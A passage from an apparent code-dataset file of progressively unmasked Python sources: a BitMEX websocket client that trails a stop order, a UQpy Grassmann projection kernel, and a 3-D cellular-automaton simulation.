messages.\"\"\"\n message = json.loads(message)\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n if 'subscribe' in message:\n if not message['success']:\n self.error(\n 'Unable to subscribe to %s. 
Error: \"%s\" Please check and restart.'\n % (message['request']['args'][0], message['error']))\n elif 'status' in message:\n if message['status'] == 400:\n self.error(message['error'])\n if message['status'] == 401:\n self.error('API Key incorrect, please check and restart.')\n elif action:\n if table not in self.data:\n self.data[table] = []\n if table not in self.keys:\n self.keys[table] = []\n if action == 'partial':\n self.data[table] += message['data']\n self.keys[table] = message['keys']\n elif action == 'insert':\n self.data[table] += message['data']\n if table not in ['order', 'orderBookL2'] and len(self.data[\n table]) > TrailingShell.MAX_TABLE_LEN:\n self.data[table] = self.data[table][TrailingShell.\n MAX_TABLE_LEN // 2:]\n elif action == 'update':\n for updateData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[\n table], updateData)\n if not item:\n continue\n item.update(updateData)\n elif action == 'delete':\n for deleteData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[\n table], deleteData)\n self.data[table].remove(item)\n else:\n raise Exception('Unknown action: %s' % action)\n instrument = self.get_instrument(symbol=self.order.symbol)\n if instrument is not None:\n self.last_price = instrument['lastPrice']\n if self.tracking:\n if (self.last_price > self.max_price and self.order.side ==\n 'Sell'):\n self.max_price = self.last_price\n elif self.last_price < self.min_price and self.order.side == 'Buy':\n self.min_price = self.last_price\n <mask token>\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-5": "import json\nimport decimal\nimport threading\nimport websocket\nfrom time import sleep\nfrom supervisor.core.utils.math import to_nearest\n\n\ndef find_item_by_keys(keys, table, match_data):\n for item in table:\n matched = True\n for key in keys:\n if item[key] != match_data[key]:\n matched = False\n if matched:\n return item\n\n\nclass TrailingShell:\n # Don't grow a table larger than this amount. Helps cap memory usage.\n MAX_TABLE_LEN = 200\n\n def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):\n self.tick_size = tick_size\n self.exited = False\n self.test = test\n\n self.order = order\n self.offset = offset\n\n self.last_price = 0\n self._min_price = float('inf')\n self._max_price = -1\n\n self.initial_price = float('nan')\n\n self.tracking = False\n self.ws = None\n\n self.__reset()\n\n if init_ws:\n self.connect()\n\n def __del__(self):\n self.exit()\n\n def exit(self):\n self.exited = True\n if self.ws is not None:\n self.ws.close()\n\n def __reset(self):\n self.data = {}\n self.keys = {}\n self.exited = False\n self._error = None\n\n def get_instrument(self, symbol):\n instruments = self.data.get('instrument', None)\n if instruments is None:\n return None\n matching_instruments = [i for i in instruments if i['symbol'] == symbol]\n if len(matching_instruments) == 0:\n raise Exception(\"Unable to find instrument or index with symbol: \" + symbol)\n instrument = matching_instruments[0]\n # Turn the 'tickSize' into 'tickLog' for use in rounding\n # http://stackoverflow.com/a/6190291/832202\n instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1\n return instrument\n\n def calculate_new_price(self, extremum) -> float:\n if self.order.side == 'Sell':\n needed_price = extremum * (1 - self.offset / 100)\n else:\n needed_price = extremum * (1 + self.offset / 100)\n needed_price = to_nearest(needed_price, tickSize=self.tick_size)\n\n return needed_price\n\n @property\n def min_price(self):\n return self._min_price\n\n @min_price.setter\n def min_price(self, value):\n if value < self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._min_price = value\n\n @property\n def max_price(self):\n return self._max_price\n\n @max_price.setter\n def max_price(self, value):\n if value > self.initial_price:\n new_price = self.calculate_new_price(value)\n self.order.move(to=new_price)\n self._max_price = value\n\n def stop_trailing(self):\n self.tracking = False\n\n def start_trailing(self, initial_price: float):\n \"\"\"\n\n :param initial_price: the price after reaching which order will be moving\n \"\"\"\n\n self._max_price = -1\n self._min_price = float('inf')\n self.initial_price = initial_price\n self.tracking = True\n\n def connect(self):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n\n symbol = self.order.symbol\n\n if self.test:\n host = 'wss://testnet.bitmex.com/realtime'\n else:\n host = 'wss://bitmex.com/realtime'\n # Get WS URL and connect.\n endpoint = f\"realtime?subscribe=instrument:{symbol}\"\n ws_url = host + endpoint\n self.__connect(ws_url)\n\n # Connected. 
Wait for partials\n self.__wait_for_symbol()\n\n def __connect(self, ws_url):\n self.ws = websocket.WebSocketApp(ws_url,\n on_message=self.__on_message,\n on_close=self.__on_close,\n on_open=self.__on_open,\n on_error=self.__on_error,\n header=[])\n\n self.wst = threading.Thread(target=lambda: self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n\n # Wait for connect before continuing\n conn_timeout = 5\n while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:\n sleep(1)\n conn_timeout -= 1\n\n if not conn_timeout or self._error:\n self.exit()\n\n def __wait_for_symbol(self):\n while not {'instrument'} <= set(self.data):\n sleep(0.1)\n\n def __on_message(self, message):\n \"\"\"Handler for parsing WS messages.\"\"\"\n\n message = json.loads(message)\n\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n\n if 'subscribe' in message:\n if not message['success']:\n self.error(\"Unable to subscribe to %s. Error: \\\"%s\\\" Please check and restart.\" %\n (message['request']['args'][0], message['error']))\n elif 'status' in message:\n if message['status'] == 400:\n self.error(message['error'])\n if message['status'] == 401:\n self.error(\"API Key incorrect, please check and restart.\")\n elif action:\n\n if table not in self.data:\n self.data[table] = []\n\n if table not in self.keys:\n self.keys[table] = []\n\n # There are four possible actions from the WS:\n # 'partial' - full table image\n # 'insert' - new row\n # 'update' - update row\n # 'delete' - delete row\n if action == 'partial':\n self.data[table] += message['data']\n # Keys are communicated on partials to let you know how to uniquely identify\n # an item. We use it for updates.\n self.keys[table] = message['keys']\n elif action == 'insert':\n self.data[table] += message['data']\n\n # Limit the max length of the table to avoid excessive memory usage.\n # Don't trim orders because we'll lose valuable state if we do.\n if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:\n self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]\n\n elif action == 'update':\n # Locate the item in the collection and update it.\n for updateData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[table], updateData)\n if not item:\n continue # No item found to update. Could happen before push\n\n # Update this item.\n item.update(updateData)\n\n # Remove canceled / filled orders\n # if table == 'order' and item['leavesQty'] <= 0:\n # self.data[table].remove(item)\n\n elif action == 'delete':\n # Locate the item in the collection and remove it.\n for deleteData in message['data']:\n item = find_item_by_keys(self.keys[table], self.data[table], deleteData)\n self.data[table].remove(item)\n else:\n raise Exception(\"Unknown action: %s\" % action)\n\n instrument = self.get_instrument(symbol=self.order.symbol)\n if instrument is not None:\n self.last_price = instrument['lastPrice']\n if self.tracking:\n if self.last_price > self.max_price and self.order.side == 'Sell':\n self.max_price = self.last_price\n elif self.last_price < self.min_price and self.order.side == 'Buy':\n self.min_price = self.last_price\n\n def __on_close(self):\n self.exit()\n\n def __on_open(self):\n pass\n\n def __on_error(self, error):\n if not self.exited:\n self.error(error)\n\n def error(self, err):\n self.exit()\n",
"step-ids": [
14,
15,
16,
18,
25
]
}
|
[
14,
15,
16,
18,
25
] |
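A hedged usage sketch for TrailingShell: the order object's interface is not shown in the row, so the stub below only stands in for whatever exposes .symbol, .side and .move(to=...). With test=True the constructor opens a live websocket to the BitMEX testnet feed.

class StubOrder:
    symbol = 'XBTUSD'
    side = 'Sell'

    def move(self, to):
        print('moving stop to', to)

trail = TrailingShell(StubOrder(), offset=1, tick_size=0.5, test=True)
trail.start_trailing(initial_price=10000.0)
# the websocket thread now keeps the order 1% below each new price maximum
trail.stop_trailing()
trail.exit()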
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProjectionKernel(GrassmannianKernel):
<|reserved_special_token_0|>
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
        :param xi_j: Tuple of orthonormal matrices representing the Grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float]=None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
        :param xi_j: Tuple of orthonormal matrices representing the Grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
from typing import Union, Tuple
import numpy as np
from UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float]=None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) ->float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
        :param xi_j: Tuple of orthonormal matrices representing the Grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, 'fro')
return n * n
<|reserved_special_token_1|>
from typing import Union, Tuple
import numpy as np
from UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel
class ProjectionKernel(GrassmannianKernel):
def __init__(self, kernel_parameter: Union[int, float] = None):
"""
:param kernel_parameter: Number of independent p-planes of each Grassmann point.
"""
super().__init__(kernel_parameter)
def element_wise_operation(self, xi_j: Tuple) -> float:
"""
Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.
        :param xi_j: Tuple of orthonormal matrices representing the Grassmann points.
"""
xi, xj = xi_j
r = np.dot(xi.T, xj)
n = np.linalg.norm(r, "fro")
return n * n
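A minimal usage sketch (added for illustration; it assumes UQpy and its
GrassmannianKernel base class are importable, and builds two random
orthonormal bases via QR):

if __name__ == '__main__':
    rng = np.random.default_rng(0)
    n, p = 6, 2
    xi, _ = np.linalg.qr(rng.standard_normal((n, p)))  # n x p orthonormal basis
    xj, _ = np.linalg.qr(rng.standard_normal((n, p)))
    kernel = ProjectionKernel()
    # The kernel entry lies in [0, p] and equals p when the two p-planes coincide.
    print(kernel.element_wise_operation((xi, xj)))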
|
flexible
|
{
"blob_id": "14ce803e3deb529b489c150c7ecc702118448acb",
"index": 9022,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ProjectionKernel(GrassmannianKernel):\n <mask token>\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-3": "<mask token>\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float]=None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-4": "from typing import Union, Tuple\nimport numpy as np\nfrom UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float]=None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) ->float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, 'fro')\n return n * n\n",
"step-5": "from typing import Union, Tuple\n\nimport numpy as np\n\nfrom UQpy.utilities.kernels.baseclass.GrassmannianKernel import GrassmannianKernel\n\n\nclass ProjectionKernel(GrassmannianKernel):\n\n def __init__(self, kernel_parameter: Union[int, float] = None):\n \"\"\"\n :param kernel_parameter: Number of independent p-planes of each Grassmann point.\n \"\"\"\n super().__init__(kernel_parameter)\n\n def element_wise_operation(self, xi_j: Tuple) -> float:\n \"\"\"\n Compute the Projection kernel entry for a tuple of points on the Grassmann manifold.\n\n :param xi_j: Tuple of orthonormal matrices representing the grassmann points.\n \"\"\"\n xi, xj = xi_j\n r = np.dot(xi.T, xj)\n n = np.linalg.norm(r, \"fro\")\n return n * n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def add_coord(c1, c2):
return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
all_neighbors_coord = []
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
if i != 0 or j != 0 or k != 0:
all_neighbors_coord.append((i, j, k))
def add_coord(c1, c2):
return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
inp = 'test.txt'
if len(sys.argv) == 2:
inp = sys.argv[1]
world = parse_world([r.strip() for r in open(inp, 'r').readlines()])
l = life(world)
l.print()
l.run(6)
print(l.count_active())
<|reserved_special_token_1|>
#!/usr/bin/env python3
import sys
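# Precompute the 26 offsets from a cube to its neighbors in 3-D: every
# combination of -1/0/+1 per axis except the all-zero offset.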
all_neighbors_coord = []
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
if i != 0 or j != 0 or k != 0:
all_neighbors_coord.append((i, j, k))
def add_coord(c1, c2):
return (c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2])
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return ((min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs)))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
else:
if self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
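        # Scan a bounding box one cell larger than the current world on every
        # side, since inactive cells just outside the border can become active.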
for i in range(ws[0][0]-1,ws[1][0]+2):
for j in range(ws[0][1]-1,ws[1][1]+2):
for k in range(ws[0][2]-1,ws[1][2]+2):
self.get_next_square_state((i,j,k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2]+1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1]+1):
s = ''
for i in range(ws[0][0], ws[1][0]+1):
if self.is_active((i,j,k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[(i,j,k)] = '#'
return world
inp = 'test.txt'
if len(sys.argv) == 2:
inp = sys.argv[1]
world = parse_world([r.strip() for r in open(inp, 'r').readlines()])
l = life(world)
l.print()
l.run(6)
print(l.count_active())
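A quick sanity check (an added sketch, not part of the original script): with
the well-known 3x3 sample grid, six steps of this 3-D variant should leave 112
active cubes.

checker = life(parse_world(['.#.', '..#', '###']))
checker.run(6)  # note: run() also prints every intermediate generation
assert checker.count_active() == 112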
|
flexible
|
{
"blob_id": "e7060658ae1838b0870b2a3adb61c9f8d78c93c7",
"index": 3245,
"step-1": "<mask token>\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef add_coord(c1, c2):\n return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\n<mask token>\n",
"step-4": "<mask token>\nall_neighbors_coord = []\nfor i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if i != 0 or j != 0 or k != 0:\n all_neighbors_coord.append((i, j, k))\n\n\ndef add_coord(c1, c2):\n return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\ninp = 'test.txt'\nif len(sys.argv) == 2:\n inp = sys.argv[1]\nworld = parse_world([r.strip() for r in open(inp, 'r').readlines()])\nl = life(world)\nl.print()\nl.run(6)\nprint(l.count_active())\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\n\nall_neighbors_coord = []\nfor i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if i != 0 or j != 0 or k != 0:\n all_neighbors_coord.append((i, j, k))\n\ndef add_coord(c1, c2):\n return (c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2])\n\nclass life:\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return ((min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs)))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n else:\n if self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0]-1,ws[1][0]+2):\n for j in range(ws[0][1]-1,ws[1][1]+2):\n for k in range(ws[0][2]-1,ws[1][2]+2):\n 